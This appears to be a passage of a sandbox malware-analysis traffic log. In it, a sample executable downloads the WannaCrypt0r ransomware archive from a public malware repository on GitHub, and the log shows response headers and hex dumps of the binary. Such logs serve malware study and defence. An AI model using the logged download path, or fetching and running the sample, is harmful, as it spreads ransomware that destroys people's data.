                                                                                                                                                2022-09-29 12:51:27 UTC4001INData Raw: 5a 58 c2 37 e0 5d 4c 0f 17 ae 63 58 14 e2 5a 5f 1d 65 a3 0a 0c 42 a1 c8 49 6f 11 b5 3f 7e 04 01 a8 50 18 7c 2a 3f 6c 7f 10 2d 90 3b bc 63 7a 87 16 e9 da 0b ce a5 2c bf 7a 90 b3 76 08 ca cf fe f3 e6 f6 4a 05 3d 97 21 cc 9a e2 da e6 81 c4 2c cb 86 ec 37 46 6a 0c 10 4a 0f 02 3d ba 80 d3 3e d0 a6 34 71 bd 6a a6 ae f5 13 b3 19 9f 00 3b bc fc ed 1f c7 75 99 25 41 5c 3a d4 98 88 dc df 1f ca d0 60 13 88 f2 bb 98 f8 5e 05 d2 4a d5 49 57 d7 c0 3e cc 72 9f 38 37 3a ce d3 ce 71 91 35 3b 59 dd 07 41 20 c7 dd 69 ef 95 eb e9 48 b5 33 46 49 d7 e8 9a b0 ed f2 b7 7e b8 b6 8d b2 38 ca fd 04 a3 88 38 e4 b2 11 aa 95 a9 e3 ca 38 5d 35 41 fd e8 a0 18 e3 41 7a 0f f8 b1 e1 44 b9 3a 42 96 26 49 6c e6 c8 4b fd 5c 1a 2a ec 9a d3 04 cb fd 44 42 51 75 42 d1 07 26 d0 ce c7 3e 03 cd f7
                                                                                                                                                Data Ascii: ZX7]LcXZ_eBIo?~P|*?l-;cz,zvJ=!,7FjJ=>4qj;u%A\:`^JIW>r87:q5;YA iH3FI~888]5AAzD:B&IlK\*DBQuB&>
                                                                                                                                                2022-09-29 12:51:27 UTC4002INData Raw: 30 68 d1 4d 94 cc 33 41 8c 0a 6d 02 99 c1 b0 2e 8a 54 3c f5 68 86 59 9d a8 0b c5 d9 ad ce d8 c4 b4 f2 be b4 51 db 07 54 6a 90 a0 fe 3f f5 f3 6f e8 41 3b a7 ec ea 7d 54 86 bc 84 75 9e 24 a7 62 f8 ac c6 20 9b 86 5e 1d 35 4d 47 d7 7b f9 ca d1 ef 02 d0 22 d6 d1 1e 2c 91 8a 1b 49 52 ae cf 01 77 9b e4 26 b2 81 de 27 c1 6e 91 e6 2e 19 e9 5e 2c c2 94 6a a8 a2 a8 16 26 a9 da 2d 54 f3 95 be 76 ce a0 8d 42 ac 8f 35 5d 15 3a d7 e2 7f aa 61 3e 84 87 a7 6f ae 82 d2 f7 b3 24 e8 33 f4 22 a7 37 e5 2c 15 03 cf 3a 36 41 ac a3 1c e3 09 87 3a 2a 69 c9 29 6d d4 47 ab 0b fe dd 2d 01 dd f2 35 20 e6 d7 f3 f9 c6 87 b4 4c 82 67 59 c8 08 e5 ce 05 6a 2e 0f bc 4a 51 07 78 58 3c 7f c2 99 1f 84 3d 81 92 1c 19 67 86 18 14 ab 67 83 36 28 e9 3a 7e 16 4f a7 c4 6c 3a ea d8 e9 f3 07 98 2f c0
                                                                                                                                                Data Ascii: 0hM3Am.T<hYQTj?oA;}Tu$b ^5MG{",IRw&'n.^,j&-TvB5]:a>o$3"7,:6A:*i)mG-5 LgYj.JQxX<=gg6(:~Ol:/
                                                                                                                                                2022-09-29 12:51:27 UTC4003INData Raw: 7d f7 ca 32 ea 27 d2 bc 1e e4 9c ab 11 4a c7 57 d1 70 59 36 ff 67 21 93 81 d6 7a b6 03 15 bb 16 43 bb de 04 21 de 05 49 24 df d7 f7 c5 f3 73 0b b1 5e 57 76 7b e4 48 0a ec 53 18 24 51 09 ea b5 71 b0 7e 7e d9 74 7f 0c 74 45 11 87 de 68 d2 45 1a dd 9c 76 74 35 4c ad 89 ca a8 de cc a6 75 e5 3a 05 6c c9 67 7a 76 a6 83 17 89 c5 32 62 ad b6 c5 d5 3a c8 96 2c 45 c5 b6 29 98 8a 06 35 c9 4d c9 ca ff 73 81 6e e4 5c 72 cb 1a 9c ce 22 ba ec a7 bd 92 f7 41 40 1f eb 9f d2 3f 96 88 47 91 a2 f0 4e cc 49 d4 d8 53 75 fa 70 e8 6a 94 12 f4 6e 22 8a cc 5f 54 68 62 d1 41 2d 49 59 5a ce ea 6d 60 e0 6c cf 4c d5 9f e6 09 29 fa 5c f0 38 28 79 5c ea f5 b0 9b d1 bc 39 7b 17 b8 c5 2f b1 14 c4 37 52 ab 2b 62 3b 75 d1 c5 7f 64 a5 06 36 da e2 b7 fe c1 4e 0c 6c b0 e0 d0 7a 5f 5e 02 df 71
                                                                                                                                                Data Ascii: }2'JWpY6g!zC!I$s^Wv{HS$Qq~~ttEhEvt5Lu:lgzv2b:,E)5Msn\r"A@?GNISupjn"_ThbA-IYZm`lL)\8(y\9{/7R+b;ud6Nlz_^q
                                                                                                                                                2022-09-29 12:51:27 UTC4019INData Raw: d7 c6 57 03 d1 c3 93 8a f2 87 7f 02 7b c5 69 70 91 47 c3 d2 ba 5a 14 88 0c 97 61 07 a8 b9 46 fb 52 bb 40 05 8e 68 68 5e 6c 0b f2 f3 6c 76 9b 96 41 76 39 05 c1 ef 73 09 52 57 7e 2d 9e bf 8f 6e 5a 18 1e d1 47 d6 0b 18 3c d6 6c 8d 78 94 cc 7e 78 e4 60 58 9a f2 8c d1 be ff 81 07 81 1d 64 f0 29 98 e0 bd fc c9 d3 df 2e 9e 6a 9c fb c9 86 71 31 05 6a 46 b6 b6 3f f5 72 60 ee d0 9f 15 3f c5 27 7e 69 42 22 5a f7 7e 4b 1c da 54 12 ba 2f 5d a3 ab 48 45 80 d0 2d 86 d2 08 c2 e6 20 20 8a 73 31 d6 83 bd d7 9f d2 f9 2c 3e 92 25 c6 d2 29 65 11 03 18 5e 3c ff 0d 9e 79 61 0f 81 05 50 dc 1e 0d b7 c1 80 58 3e ee 1c 41 ee b5 8a e8 e0 02 e9 dd 12 1d ed c2 cd ea fe 2c 61 6e 52 ca 26 e5 66 95 41 4a 01 7f 9c eb f7 ec 6a fa 92 b1 9c 33 16 44 72 94 42 15 25 25 a9 07 b0 04 61 da c0 c3
                                                                                                                                                Data Ascii: W{ipGZaFR@hh^llvAv9sRW~-nZG<lx~x`Xd).jq1jF?r`?'~iB"Z~KT/]HE- s1,>%)e^<yaPX>A,anR&fAJj3DrB%%a
                                                                                                                                                2022-09-29 12:51:27 UTC4035INData Raw: 31 12 c9 20 11 d2 1c a4 da fd 18 4b 97 f9 9f 60 e9 8e 2b 34 ac f6 df 7d 71 99 78 54 4e 4c cc 69 bb c6 49 c4 79 68 ec bc b4 d8 78 71 70 17 af 5b 72 7e 9a 54 d4 a4 4f a4 10 46 8b 30 10 5d 24 94 c7 73 f3 d1 21 11 62 5c fe a0 3a b9 82 f6 6e 49 13 f7 84 d4 76 30 90 00 89 30 31 98 fb bb b1 49 2a 64 2e 90 2a e4 bb b0 50 4a f2 d3 9f e0 78 f0 91 48 79 21 86 87 8b 4e 13 eb c5 9c c1 07 26 b2 25 c7 95 1f b4 9e 6d 18 6e 73 25 56 d5 aa 29 a9 99 ef d8 40 83 86 0c aa a2 c8 63 73 c8 7f d3 b3 c3 05 2b e7 f9 55 2b af 35 44 03 39 82 49 5c 62 e4 ce 51 98 1a d4 bc 47 e2 36 2b fd 92 96 26 58 40 4d 51 67 0c 0e 7a b1 c2 64 09 37 70 96 4a 8f 61 c0 7b ae 93 24 94 7b 3a 2e ba ab 15 47 be 3d 1e 83 73 5a 8e 6a eb 41 65 5a 2c c5 08 49 57 d7 12 78 13 99 e0 d7 be 9f 60 e7 68 78 5c 3c 39
                                                                                                                                                Data Ascii: 1 K`+4}qxTNLiIyhxqp[r~TOF0]$s!b\:nIv001I*d.*PJxHy!N&%mns%V)@cs+U+5D9I\bQG6+&X@MQgzd7pJa{${:.G=sZjAeZ,IWx`hx\<9
                                                                                                                                                2022-09-29 12:51:27 UTC4051INData Raw: 2a 79 0c 8d 3e 14 e6 14 2d 43 6b 61 ef 0d 54 ff c4 35 2d aa 7b 7f bb b0 89 d6 25 7e 52 14 8b 53 6f fa cb ed 1e c2 cf f8 39 87 dc 22 ff 9c c3 73 e6 c3 7a 25 00 95 ca a5 98 5d 45 7c f1 6e 03 d8 0e a3 52 4f 8d 9d f0 10 51 7c 1b 3f 75 23 c3 b5 53 9d 04 a1 54 14 22 c8 f2 5c 0a 85 80 2b 19 40 f6 fd 47 87 a1 dc d3 12 74 67 2d 7c 35 8a af e4 78 f4 dc 42 50 e8 7d 6a 14 63 80 20 b5 2c 0c 6c ed 6b 0e d9 72 3a bc c6 59 91 39 e4 e2 84 75 07 a4 31 93 e7 60 09 68 39 d2 c9 f6 07 f0 83 ef a4 15 f8 c0 96 88 6d 08 3d 23 e1 a0 ee 8e b3 cc 77 c5 64 5e b9 55 07 3f e4 4c 53 7a 23 99 fa 5d bc 3d 89 7c d0 7e d4 9d 49 71 a8 e2 56 86 8f 62 52 b4 45 35 da 93 74 88 86 82 fb 91 ef 9a 2d 7e 84 a1 3a 1b c6 2a ea d1 f0 8a 08 9e ff b8 f1 a6 ae 9b 6e 74 1f 97 da 38 df 5b da a2 f2 22 5c 3f
                                                                                                                                                Data Ascii: *y>-CkaT5-{%~RSo9"sz%]E|nROQ|?u#ST"\+@Gtg-|5xBP}jc ,lkr:Y9u1`h9m=#wd^U?LSz#]=|~IqVbRE5t-~:*nt8["\?
                                                                                                                                                2022-09-29 12:51:27 UTC4067INData Raw: ac 83 86 92 f5 d3 d4 1a 67 b2 69 16 fd 26 e4 d6 3f f0 20 f8 46 d7 75 ed e0 75 9d c6 74 d5 8d 80 73 7e 71 0a 32 6f ca dc 76 70 6d 6a f0 15 1f 50 b2 af 4e 0e 19 d8 9b be 5d a3 b0 8b 96 d4 12 60 cb f2 30 ba d4 9e c3 35 51 bb e0 af 55 f2 41 8a 11 98 a4 8c aa 38 41 36 58 f4 b9 6c 11 0e 29 dd 61 d3 77 15 03 6c c2 6a b7 d1 48 8a d4 1f 65 dc 82 6b b0 83 93 77 47 6b 76 9b d6 a5 0c ce ca c7 4a d3 c4 e2 62 b3 69 ae 48 3b 18 ed 4b 5a 85 39 34 3c ee 48 14 4a 35 ef 48 fb 61 80 91 7d bc 96 a5 66 16 9f 2e a2 ca 23 21 ec 54 e8 86 41 c1 e9 e0 8f d2 d2 0c 54 92 0a 40 8c 3d 62 27 b2 33 bc 7f 57 6a 51 89 09 c9 5c 19 11 f0 e2 20 66 36 cb 9e 34 17 35 cc 7d 19 78 f0 91 79 df 91 dc cc 59 51 a6 b4 a9 12 2e ba 73 05 e6 23 2f ac 1b 18 f2 ac ce 51 e3 f1 63 fa a8 bb b1 b2 6f f7 f9 2b
                                                                                                                                                Data Ascii: gi&? Fuuts~q2ovpmjPN]`05QUA8A6Xl)awljHekwGkvJbiH;KZ94<HJ5Ha}f.#!TAT@=b'3WjQ\ f645}xyYQ.s#/Qco+
                                                                                                                                                2022-09-29 12:51:27 UTC4083INData Raw: 78 b7 97 32 c4 37 22 27 06 d3 98 c3 b8 93 ad 01 94 c7 2b 29 8a 09 db 95 c4 24 c4 60 ec 2a 33 af c3 4b 86 55 6c 3f 37 0a 0f 1f 12 06 9e e8 ed 7a 8a ec fb bc 72 f7 f9 c4 b0 86 cf 3f f9 6c 0f 72 f6 ab 6a a0 7a 3b 08 d4 38 77 5e 78 ec 3a 13 1e c7 59 be 38 65 d3 04 d6 52 ed 54 99 8b 83 7f ee 80 4f 4c 90 b1 40 b4 cc 81 22 15 dd 5e 28 c6 aa a7 eb e0 de 4a 99 b8 bd 98 f3 43 5c 28 25 ff 52 5d 07 e3 0d 5e 9c 94 72 96 65 3a 81 1a 41 62 93 f1 e2 f0 80 f8 b0 6a d5 dc 27 9e 81 61 87 4a 73 54 96 e3 2f 02 a7 54 da e3 ab 00 ad 3a 0b 9c 01 7f 51 b0 05 72 d2 a0 cc 33 bc c7 81 10 cd 6e 10 e8 de ea 44 30 e0 5c 3c 91 77 9c 21 02 85 1f 14 63 c3 19 3b ce cb b3 1c 81 de a0 2f 31 b9 71 ba 26 d8 ef 8d 47 de 45 e4 e0 3a c2 41 d3 1c 79 e6 3e 0c 32 99 e9 1c b1 5f 3a b6 e3 66 4a c9 ec
                                                                                                                                                Data Ascii: x27"'+)$`*3KUl?7zr?lrjz;8w^x:Y8eRTOL@"^(JC\(%R]^re:Abj'aJsT/T:Qr3nD0\<w!c;/1q&GE:Ay>2_:fJ
                                                                                                                                                2022-09-29 12:51:27 UTC4099INData Raw: 18 90 c9 dc 7c 8c f4 20 19 89 9e a7 9b a6 53 4e d3 c3 bf 56 a3 92 a6 35 69 33 0f ff 81 ce 4b 35 7d f3 16 24 a7 f9 a2 6e 8b 60 1c 36 29 4e 9e 41 de cd 52 23 8e db 80 12 ec 62 bd d7 f6 35 fa f2 89 69 e1 c8 77 30 3f dc 12 43 b1 3b 35 9c 73 08 d5 16 3f f7 46 41 53 0c 3c 93 98 f9 42 02 fc e1 61 9e 1e 10 7b 1e b7 db 4b 6f e5 65 d6 2a c1 6e 66 c8 81 a2 fe 59 da de 46 f9 16 f3 e2 78 72 74 81 dd 9e 69 3b 36 9f da b3 48 9d 14 21 65 b1 75 82 bc 09 ff d9 db 48 9e 27 fc 73 97 cc a8 51 13 1a e5 de ae c7 bf 59 29 87 c2 4c 6b 22 a8 3f f1 51 3e 59 f2 b5 f9 c7 62 dc 94 6a 8a da f3 7c 52 78 ee 84 14 bb d0 92 d3 04 f0 b3 51 fb cd e9 ac 10 36 9a 25 eb 2d 91 ca 82 c8 e9 df 8f f1 5c 17 e8 9b 3c 0d 07 b1 ba 28 91 23 87 8f b8 90 74 06 81 fb 99 0c 9e d9 c5 12 86 06 c9 3c 27 48 d8
                                                                                                                                                Data Ascii: | SNV5i3K5}$n`6)NAR#b5iw0?C;5s?FAS<Ba{Koe*nfYFxrti;6H!euH'sQY)Lk"?Q>Ybj|RxQ6%-\<(#t<'H
                                                                                                                                                2022-09-29 12:51:27 UTC4115INData Raw: 03 ad 3d db 62 96 de 80 a6 2e ad 54 6e a9 18 f6 d4 e7 58 c3 a9 25 08 04 f3 23 81 57 6f 8d 15 4b 0d 00 03 38 79 b2 79 64 c8 bb 62 88 2f 18 a5 a1 9c b2 24 b3 08 82 e4 7d 27 2b eb e6 d2 e5 17 fb 47 59 d4 97 b6 5a 8b f1 e1 82 d4 03 01 46 26 a7 f5 8c 8f c7 7e e2 69 72 e8 0f 67 f3 d5 03 8b ab 2b ca 14 75 92 c6 a1 9c ad 09 5a 7d fa 4c 20 aa 36 39 83 76 05 7f 20 b0 b4 46 cd ad 04 62 7b 5c ed 8d 2d 0a af 00 71 cc 7f ca e4 75 cf e2 c1 13 ee 11 0a 6a 5f bf f7 22 d1 b7 df 85 91 4e a1 3b 69 3d 6d 57 95 67 aa 3a 33 da ad 0d f2 de d6 1a 99 ab 5d d3 73 18 e0 f1 3d 5f 09 5c 11 fd eb fa fa 1b 79 c3 2f 8c 02 51 5f 92 4e b2 71 e0 0e e3 55 24 41 ae 04 c2 3f fa cc d4 eb 9c c2 dd 22 50 b9 e2 c1 f3 7e e1 49 d0 1a c3 94 dc 8d 83 cf 24 09 b5 ae 7e 99 91 10 6d a5 ac b3 bf a5 cf da
                                                                                                                                                Data Ascii: =b.TnX%#WoK8yydb/$}'+GYZF&~irg+uZ}L 69v Fb{\-quj_"N;i=mWg:3]s=_\y/Q_NqU$A?"P~I$~m


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                24192.168.2.549724140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:27 UTC4120OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:27 UTC4120INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:27 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:27 UTC4120INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                25192.168.2.549725185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:28 UTC4122OUTGET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:28 UTC4122INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 3477754
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "f2d2308d5c9c4012fb553c82b7938a4339a5db5e022f0a058ece1b06d8a727b6"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0809:67C0:101C7CA:1115ED1:6335934B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:28 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6947-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455888.074142,VS0,VE167
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: dacf68724d576bd7d09d93a31a7d0b13b1f0a283
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:28 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:28 UTC4123INData Raw: 50 4b 03 04 14 00 01 00 08 00 ac a3 ad 4a aa fc 22 40 3e 10 35 00 00 a0 35 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 61 6e 6e 61 43 72 79 70 74 30 72 2e 65 78 65 6f 0f db 68 af 01 aa 98 b9 37 e0 93 e8 38 9b 1c 5d 92 7d 1d 81 21 e7 ab 1c 27 cd f4 c9 34 aa 90 bb 64 6c d1 0e 57 d5 03 fa a7 d3 a2 dc 6e 89 67 e9 31 78 19 3b 1f 1d 3a d2 b0 d0 24 57 d4 e1 c6 b3 29 40 d4 13 5d 74 20 b1 b5 85 73 bf 49 ef af a4 c9 4a 92 ab c7 42 0c 3a 9a 7c 98 66 63 4a 0d b6 d9 48 74 53 83 cb 7d 19 58 00 15 50 65 b6 b2 30 8c 14 06 ae e7 66 35 55 df f2 16 2f 88 d0 5e 40 78 9b 4f 9d 09 80 69 94 b2 d3 ca 12 63 f2 d8 fe d2 3a 6e 6f f0 89 ce 22 6d df 96 4f c5 24 c8 8c 8c 8d 2e 85 cc 02 e0 3c 1c fc 48 1b df 66 24 a3 96 9b 30 a0 a8 47 81 f7 56 19 44 83 a0 79 e6 99 0e 57 6e e9 01
                                                                                                                                                Data Ascii: PKJ"@>55Endermanch@WannaCrypt0r.exeoh78]}!'4dlWng1x;:$W)@]t sIJB:|fcJHtS}XPe0f5U/^@xOic:no"mO$.<Hf$0GVDyWn
                                                                                                                                                2022-09-29 12:51:28 UTC4124INData Raw: 91 f8 c1 77 dc 6b 6d b2 2f 09 2e b8 0a ce 32 a8 88 cf 1e 7e 8f ce b6 d4 d0 df 58 c6 fe 47 46 8d 5e 84 d0 1e ca 7f a4 1a 15 4d bb 03 60 a3 3f 1a 45 ca ca 6a 20 6b 7d 58 65 5a e5 1b c7 59 31 24 91 53 1f 77 27 f1 b4 66 fc 10 21 39 75 03 ec 5e f2 8f 52 1e 26 c4 45 29 b1 c7 1c 80 79 c6 a8 93 75 d6 71 68 d3 c3 f4 8b 4a cd af 65 73 f1 47 72 25 c6 d4 26 6b db b4 62 3d 09 46 3a 82 b9 35 32 aa b1 30 4b 40 4c 1a 7a c4 a0 68 b2 17 04 ac bd 81 99 6c ea 0a 9b c2 1f 58 12 a5 17 f5 81 13 cc e6 8a 9e 43 c8 e9 3b 86 4a 79 fb f0 a9 10 c5 5d bd 55 dc 70 df bb 48 eb 5c e2 0b 7f 79 e8 41 b4 0e 12 c4 b4 e2 5c db e8 9e 21 48 fc a0 99 9d e8 bd 4d 5d d8 ae 0a 6f fd 08 09 0b 07 82 80 f8 10 91 6d 86 0f 24 15 15 e9 cc 5a ca c1 9f 61 38 b0 b3 43 36 40 1a 6c ed a0 f7 53 ea 0b ce 8b dd
                                                                                                                                                Data Ascii: wkm/.2~XGF^M`?Ej k}XeZY1$Sw'f!9u^R&E)yuqhJesGr%&kb=F:520K@LzhlXC;Jy]UpH\yA\!HM]om$Za8C6@lS
                                                                                                                                                2022-09-29 12:51:28 UTC4126INData Raw: 69 a7 34 58 c8 26 c9 45 fd 9b d7 12 19 4c ab 25 7c 39 96 5a 5f ef 33 68 66 e1 15 40 2c 93 bd c2 ef 05 68 3b fd 3d 1a f1 5a a0 42 0d 7b 7e 82 d4 85 bb 56 32 bf 93 f1 d4 62 af 6b 16 73 61 9b c1 78 fb 53 95 ce 27 0e e5 88 05 a1 38 a0 a0 e6 e0 f1 85 a4 2e f0 b8 9d ce f0 88 e1 09 b2 62 bd a9 13 d5 67 f2 4d e4 28 c0 35 f1 fb 27 e9 24 e3 dd 50 7f e4 e1 0a d8 50 95 24 ea d2 d7 93 76 3a 0f bf 55 e4 5b 79 ef 96 aa fc fe 9f f7 f4 5c 01 86 e9 e0 59 cb 0b 05 f3 b3 85 f4 09 b9 37 bc 7f 36 48 4c de f6 79 63 48 9c d8 b1 83 37 68 65 a3 1f 08 bb 37 39 ca 5b 82 9c 1e fa d5 46 99 69 fa 88 70 e9 f6 da 58 93 9a 36 b3 ce e7 fe 78 b9 2c ca bf 07 96 63 73 cc e7 ab d7 ce 0c 1b 80 53 bf 28 74 65 7e f5 e0 fc 21 33 ce 4e d2 03 b5 9f 58 8f 3c 49 f8 c4 ba ca e7 5c d6 e3 4b ba 1e 62 f6
                                                                                                                                                Data Ascii: i4X&EL%|9Z_3hf@,h;=ZB{~V2bksaxS'8.bgM(5'$PP$v:U[y\Y76HLycH7he79[FipX6x,csS(te~!3NX<I\Kb
                                                                                                                                                2022-09-29 12:51:28 UTC4127INData Raw: a1 1e ee 3e 04 80 cf b7 6b 88 54 63 cc 38 af 0f b1 83 ad 99 0a 42 d3 46 05 e2 f5 0f f2 2e cb 25 eb 1a a9 f9 50 af 2d 51 d8 19 2c cd 70 b2 0e 22 86 c0 ab 96 ec 3d 8b de 58 6d 9c e5 cc 0d 35 7b f5 22 ec 74 fc 39 92 07 02 8a 3d 8a 13 51 22 2b 0f 77 0e 85 7e eb 06 c4 1f a8 bb 61 90 c1 9a b6 95 51 62 72 aa 95 27 1a b3 71 d3 ec 7f 88 01 33 a2 3c e5 c4 25 70 8b 57 e8 ad c8 38 15 30 dc 4c 36 25 a8 f8 74 be 29 61 c3 1b b8 3c fa 79 51 f2 33 cc 94 87 a1 c2 f9 88 63 ae ae 57 4b 7e 6e 85 0e a0 d4 66 74 b4 4d 2e a1 3f 59 06 29 59 8e c0 0b e3 71 19 b2 72 5a 91 12 b0 6e 5c af 21 54 df d0 51 31 84 5d 55 08 41 c9 03 e6 6c 6e 27 f1 7c 17 df aa d9 21 45 21 73 52 3f 58 cf 3c 14 56 79 f8 0a f1 9a 86 81 d6 2f 75 69 a6 9d 22 12 50 cf 02 12 bd a6 0c 95 5c a2 18 e1 60 49 f2 ea 52
                                                                                                                                                Data Ascii: >kTc8BF.%P-Q,p"=Xm5{"t9=Q"+w~aQbr'q3<%pW80L6%t)a<yQ3cWK~nftM.?Y)YqrZn\!TQ1]UAln'|!E!sR?X<Vy/ui"P\`IR
                                                                                                                                                2022-09-29 12:51:28 UTC4128INData Raw: a2 aa 37 1a a7 78 8d a5 c4 e9 41 72 05 b3 a8 94 89 72 bf d2 0a 42 26 14 ed f5 cb 27 93 f4 f7 a5 d5 c9 c4 b0 9f d9 d8 26 a8 da a0 b6 1b 50 04 8f 98 aa 78 38 80 1f 8e 33 02 18 92 fb 6d 8e 4f 30 97 b5 2f 0b a7 d9 67 76 f4 5a cb 0b 88 34 1e 29 aa ad f2 b5 51 da 5a 48 51 87 00 7d 4f a4 23 1c ad f8 b8 4c 2b 7b 7c f6 a3 7a 91 ec 8f 51 d4 2f 12 5a 6c 39 af f2 ea f5 20 52 fa 68 f0 25 b6 0b 9a 76 2d 2c d4 a7 2f 0c 4f 97 9f 5d a0 ff d9 6f 93 4f a9 c3 d4 39 ba 43 e2 43 f7 48 3f cb 35 79 f2 71 ec 52 57 be cf 44 47 4a 03 8f 77 10 59 49 c1 82 1b 9f 0b ff f4 3d da 4b 9e 4c b1 16 4d 54 2d 3e 67 e8 92 b2 97 29 ba dc cc 5f 2f 1c 4c e9 9e de 16 c8 fc 41 27 7a 0c 2d 80 73 73 a8 c2 d6 9b fa 5c 0c 74 76 5c 88 ec ad 46 c3 06 51 89 47 24 52 9d 1f be 9b 96 f6 0b 80 7b 06 de 99 40
                                                                                                                                                Data Ascii: 7xArrB&'&Px83mO0/gvZ4)QZHQ}O#L+{|zQ/Zl9 Rh%v-,/O]oO9CCH?5yqRWDGJwYI=KLMT->g)_/LA'z-ss\tv\FQG$R{@
                                                                                                                                                2022-09-29 12:51:28 UTC4130INData Raw: 17 47 91 aa 35 df 95 48 e2 3f 1c 22 59 8e ae 84 2d c4 99 90 d5 d1 01 71 c1 e0 e0 bf e9 a2 7d f2 01 25 9f 42 6e e5 0c e4 4b 61 d1 41 c8 42 55 c4 1a d7 bf bc 43 d5 f7 1f 58 16 32 9d 2c 3f c7 d8 d0 00 93 15 85 8e 5b 2e 99 fb 4c 67 39 e6 54 6b ff 33 e4 6b 67 b2 dc 8e bf b6 02 56 4c e4 4d 47 1f cf d3 40 a6 d5 11 18 0a a5 90 32 47 f5 b9 1e d4 f7 72 99 05 20 15 a9 d2 68 c9 88 61 bb 3f 38 62 5e fa 76 01 e2 5e 84 7a 7e 0a e9 1d 25 9c 68 04 fd 61 82 62 8c c2 35 26 95 69 39 e3 a8 18 73 6c 90 60 e8 1b e2 62 f6 75 0e 8c 46 b5 af 1c ca 26 20 0d 8f a5 a9 68 1a 15 96 69 32 26 4e c5 18 9e 1f 56 6b bc 36 8e bf c7 b6 e5 b5 21 47 55 ab 31 0e ab 78 f8 58 a3 ae a8 a4 52 1d d1 69 63 04 4f 50 68 2b d9 55 f8 d6 40 f4 db 7d 97 b1 32 93 95 51 47 a2 8b 94 40 98 b6 77 51 be 5b b9 5c
                                                                                                                                                Data Ascii: G5H?"Y-q}%BnKaABUCX2,?[.Lg9Tk3kgVLMG@2Gr ha?8b^v^z~%hab5&i9sl`buF& hi2&NVk6!GU1xXRicOPh+U@}2QG@wQ[\
